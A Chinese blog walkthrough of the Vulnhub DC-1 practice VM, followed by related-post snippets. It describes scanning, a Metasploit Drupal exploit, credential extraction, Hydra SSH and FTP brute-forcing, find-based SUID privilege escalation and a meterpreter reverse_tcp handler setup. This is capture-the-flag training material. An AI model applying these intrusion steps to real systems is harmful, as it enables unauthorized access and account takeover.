Vulnhub:DC-1

最新推荐文章于 2025-06-02 19:59:14 发布
最新推荐文章于 2025-06-02 19:59:14 发布
阅读量315 收藏 5
点赞数 5
文章标签: 网络安全 安全 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_69670995/article/details/140448865
版权

1.环境搭建

靶机下载地址

将下载的靶机导入到Oracle VM VirtualBox中,设置仅主机模式,使用和kali相同的网卡

2.渗透过程

使用nmap工具进行主机发现扫描

nmap -sn 192.168.56.0/24

发现靶机ip地址,使用nmap工具进行靶机端口扫描

nmap -sS 192.168.56.114

发现22,80,111端口,使用浏览器访问80端口

使用whatweb工具扫描网站指纹

发现使用的Drupal 7,使用msf工具查找漏洞

msfconsole

search Drupal

使用第二个模块,设置靶机ip,和攻击机ip

进入shell

使用python切换模式

查看第一个flag

提示查看配置文件,第二个flag在settings.php中

发现数据库用户和密码,登录mysql数据库

查看数据库

查看表名

发现users表,查看该表的内容

发现两个用户,这个可以修改admin的密码,需要找到密码的加密文件

加密脚本是/var/www/scripts/password-hash.sh,脚本是php写的,执行脚本

登录mysql,修改密码

修改成功,后台登录,登录页面在wp-admin

登录成功

点击flag3

查看一下用户

发现flag4,使用hydra工具爆破flag4密码

发现flag4密码,使用ssh连接

发现flag4,使用suid提权

发现find,使用find提权

提权成功,查看flag5

GJyt
关注
VulnhubDC-1
imawuya的博客
01-17 1208
VulnhubDC-1靶场通关记录
vulnhub靶场 DC-1靶机 渗透详细过程
黑战士的博客
07-26 1353
1.扫描局域网主机netdiscover用法2.开放端口扫描2.MSF使用3.hydra爆破:sudo hydra -l flag4 -P /usr/share/wordlists/rockyou.txt.gz ssh://192.168.0.100hydra+John密码包以上两种方式可以爆出flag4的密码4.suid提权:Linux下用SUID提权、find命令exec。
Vulnhub - DC-1
qq_46081990的博客
03-14 490
Nmap扫描目标主机,发现开放22、80、111、40884端口,分别运行OpenSSH 6.0p1、Apache httpd 2.2.22、rpcbind 2-4服务。MSF搜索Drupal,使用payload:exploit/unix/webapp/drupal_drupalgeddon2,成功拿到Web权限www-data。查询GTFOBins得知find的SUID提权方式如下,启用一个新的root权限的bash。上传综合辅助探测脚本LinEnum.sh至目标主机/tmp目录下,给予执行权限执行。
vulnhub靶场 DC-2靶机 渗透详细过程
黑战士的博客
02-21 1091
*4.rbash提权**
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8708
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
数据分类分级的实践与反思:源自数据分析、治理与安全交叉视角的洞察
u010872591的博客
05-30 808
但若缺乏对两者特性与适用场景的深刻理解,以及精细化的融合策略设计(例如,如何有效仲裁规则与模型的冲突、如何实现两者间的知识迁移与能力互补),这种融合易陷入“简单叠加”的误区,可能导致系统复杂性剧增,可解释性与可控性下降,最终并未带来预期的价值提升。这一现象可能在许多类似规模的场景中复现。:基于向量空间相似度进行语义理解与判定,虽然在某些场景下表现出优势,但对于细粒度的行业专业术语、隐晦的业务逻辑关联以及跨领域、弱结构化的数据内容,其识别的精确度和稳定性仍有较大提升空间,甚至可能不如经过精细调优的传统规则。
Spring Security安全实践指南
静水深流
06-01 973
本文探讨了应用程序安全性的核心价值和Spring Security的架构基础。安全性需要根据数据敏感度分级实施,漏洞会导致多维损失(经济、信誉、法律)。通过典型案例分析,论证了防御投入远低于漏洞修复成本。Spring Security采用过滤器链和认证管理器架构,支持密码编码器演进和最小权限原则,提供表单登录与HTTP Basic等认证方式。系统设计应遵循"默认拒绝"原则,通过分层防护保障关键系统安全
联软SDP+安渡:收敛暴露面 从生产网自动取数 安全高效
leagsoft_1003的博客
05-28 1405
制造业网络安全面临网络隔离与数据流通的矛盾。为解决供应商跨网协作中的安全风险和管理痛点,联软推出安渡SDP解决方案:通过专用加密隧道实现安全访问,采用IP协议栈隔离、数据指令分离等创新技术,在不开放网络端口的情况下完成自动化数据摆渡。该方案既保障了文件传输的安全性,又提高了办公效率,实现了网络安全防护与业务便捷性的统一。典型应用于BOM系统审批后的图纸自动传输场景,有效规避U盘拷贝、即时通讯等传统方式的安全隐患。
变焦位移计:机器视觉如何克服人工疲劳与主观影响?精准对结构安全实时监测
weixin_43963569的博客
05-30 1202
摘要: 变焦视觉位移监测相比传统人工监测具有显著优势。在精度上,自动化监测可达0.01mm,而人工监测受主观影响,精度仅几毫米。自动化可实现24小时高频监测,人工则耗时且滞后。自动化数据实时上传,真实可靠;人工数据易受人为干预。虽然自动化前期投入高,但长期成本效益更优。自动化监测在连续性、数据呈现等方面也优于人工监测。尽管人工监测在特定场景仍有价值,但自动化监测已成为行业发展趋势。
DeepSeek模型安全部署与对抗防御全攻略
最新发布
Programming Talk
06-02 272
DeepSeek模型的安全防护需要构建从输入到输出的全链路防御体系。本文介绍的方案已在金融、政务等领域验证,可有效拦截99%以上的常见攻击。建议企业建立持续的安全演练机制,定期更新防护规则库,特别要关注新兴的对抗攻击技术。随着DeepSeek模型能力的演进,安全防护策略也需要同步升级,建议关注OWASP AI Security等权威指南获取最新防护方案。
解决访问网站提示“405 很抱歉,由于您访问的URL有可能对网站造成安全威胁,您的访问被阻断”问题
CoffeMilk的博客
05-30 516
我们访问网站的时候会显示“405 很抱歉,由于您访问的URL有可能对网站造成安全威胁,您的访问被阻断。您的请求ID是:XXXX”,而不能正常的访问网站
NodeJS全栈开发面试题讲解——P6安全与鉴权
kennyharris
06-01 577
编号问题要点简述6.1SQL/XSS/CSRF 防护ORM 防注入、DOM转义防 XSS、CSRF Token + SameSite6.2JWT 签发与校验签名加密、有效期、对称/非对称加密、避免暴露密钥6.3登录暴破防护bcrypt 加密、IP 限制、验证码、行为识别6.4文件上传安全检查 MIME 类型、文件大小、存储路径唯一、过滤木马6.5密码加密算法选择推荐 bcrypt / argon2,使用盐值,严禁存储明文密码。
从法律层面剖析危化品证书:两证一证背后的安全逻辑
renrenti的博客
05-29 422
证书分类中暗藏法律玄机,负责人证对应《生产经营单位安全培训规定》第 7 条,要求掌握 “本单位安全生产责任制建立及落实”;两者构成了完整的安全管理法律链条,让决策层具备战略思维,执行层具备实操能力。在某危化品仓库爆炸事故中,由于负责人未持证,导致事故责任升级,企业法人被追究刑事责任。特别提醒,经营许可证与安全员证是 “双生证件”,根据《危险化学品经营许可证管理办法》,缺少任一证书都将面临 5-10 万元的罚款。去年,某涂料公司因证书不全,不仅被吊销了执照,法人还被列入了安全生产失信名单。
如何给老旧 iOS App 添加安全保护?用 Ipa Guard 对 IPA 文件混淆加固实录
2501_91510632的博客
05-29 1206
摘要:本文分享了在没有源码的情况下,如何为老旧iOS应用添加安全防护的经验。作者面对一个仅有IPA文件的五年老项目,使用Ipa Guard工具实现了类名、方法名和资源的自动混淆,在10分钟内完成处理并保持功能完整。通过对比分析,混淆后的应用在类名识别度、资源命名、安全加固等方面效果显著提升。文章指出,对无法修改源码的老项目,采用专业混淆工具是快速提升安全性的有效方案,为类似场景提供了实用解决方案。(149字)
Spring Security入门:创建第一个安全REST端点项目
静水深流
06-02 998
本文介绍了Spring Boot项目初始化与基础配置过程,重点解析了Spring Security的HTTP Basic认证机制。通过创建示例项目,展示了如何配置默认安全设置、创建测试端点并验证授权访问。文章详细剖析了HTTP Basic认证原理,包括cURL工具的使用、Base64凭证生成以及401/403状态码的区别。同时深入讲解了Spring Security核心架构,包括认证过滤器的工作流程和UserDetailsService的默认实现特性。最后强调生产环境中必须配合HTTPS使用HTTP Bas
软件测试|FIT故障注入测试工具——ISO 26262合规下的智能汽车安全验证引擎
Suresoft China的博客
05-30 1024
在智能汽车电子控制系统开发中,功能安全验证正面临重大挑战:传统故障注入测试方法效率低、周期长、成本高,且难以全面覆盖ISO 26262标准要求的各类异常场景(如ASIL D等级)。随着汽车电子系统复杂度提升,ECU、自动驾驶域控制器等关键部件亟需更高效、更精准的安全验证方案。
JWT安全:假密钥.【签名随便写实现越权绕过.】
网络安全领域___专研者.
05-28 702
JSON Web 令牌 (JWT)是一种在系统之间发送加密签名 JSON 数据的标准化格式。理论上,它们可以包含任何类型的数据,但最常用于在身份验证、会话处理和访问控制机制中发送有关用户的信息(“声明”)。 与传统会话令牌不同,服务器所需的所有数据都存储在客户端的 JWT 本身中。这使得 JWT 成为高度分布式网站的热门选择,因为用户需要与多个后端服务器无缝交互。
JWT安全:弱签名测试.【实现越权绕过.】
网络安全领域___专研者.
05-28 688
JSON Web 令牌 (JWT)是一种在系统之间发送加密签名 JSON 数据的标准化格式。理论上,它们可以包含任何类型的数据,但最常用于在身份验证、会话处理和访问控制机制中发送有关用户的信息(“声明”)。 与传统会话令牌不同,服务器所需的所有数据都存储在客户端的 JWT 本身中。这使得 JWT 成为高度分布式网站的热门选择,因为用户需要与多个后端服务器无缝交互。
李臻20242817_安全文件传输系统项目报告_第14周
weixin_52098515的博客
06-01 790
Gitee 仓库地址:https://gitee.com/li-zhen1215/homework/tree/master/Secure-file。
vulnhub靶机dc-1
01-11
### VulnHub DC-1 靶机 攻略 介绍 下载 #### 关于DC-1靶机 VulnHub上的DC-1靶机旨在提供给安全爱好者和渗透测试学习者一个实践平台,在此环境中可以合法地进行各种攻击尝试,从而提升技能。该虚拟环境模拟了一个存在多个已知漏洞的服务网络应用,允许参与者通过一系列挑战来获取系统的控制权并最终找到隐藏的标志文件(flag)[^1]。 #### 获取与安装 为了开始体验DC-1靶机的任务,首先需要访问[VulnHub官方网站](https://www.vulnhub.com/)搜索栏输入“DC-1”,点击进入详情页面下载对应的镜像文件(OVA格式),之后按照提示导入到支持OVA标准的虚拟化工具如VirtualBox或VMware Workstation Pro中完成部署工作[^3]。 #### 初始配置建议 启动后的DC-1默认会分配一个私有IP地址(例如:`192.168.x.x`),此时应该确保Kali Linux作为攻击端能够与其在同一局域网内通信正常;可以通过ping命令验证连通性状况良好后再继续后续操作。 #### 基础信息搜集阶段 当确认双方设备间通讯无碍后便进入了实际演练环节——即从基础的信息收集做起。这一步骤通常涉及使用Nmap扫描开放端口和服务版本探测等手段以了解目标主机概况: ```bash nmap -A <target-ip> ``` 上述指令将会返回有关远程服务器运行状态的关键情报,为下一步制定针对性策略奠定坚实的基础。 #### 进阶探索与利用路径 随着对DC-1认识程度加深,接下来便是寻找潜在的安全缺陷加以利用的过程。根据已有经验分享可知,成功建立Meterpreter回话意味着已经突破了初步防线,获得了更深层次的操作权限: ```ruby use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost <local-ip> # Kali IP address exploit ``` 以上Metasploit框架下的设置可帮助快速搭建监听服务等待来自受害者的连接请求,一旦形成稳定的交互通道即可执行更多高级功能比如浏览目录结构直至定位至预设的目标文件位置。 #### 密码破解辅助技巧 考虑到可能存在弱密码保护的情况,采用Hydra这样的暴力猜解程序配合常用用户名列表以及大型词库资源不失为一种高效的方法去揭示真实的身份凭证组合关系[^4]: ```bash hydra -L /usr/share/wordlists/user.txt -P /usr/share/wordlists/rockyou.txt.gz ftp://<target-ip> ``` 这里展示了针对FTP协议实施登录认证绕过的实例,当然具体应用场景还需视实际情况灵活调整参数选项。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值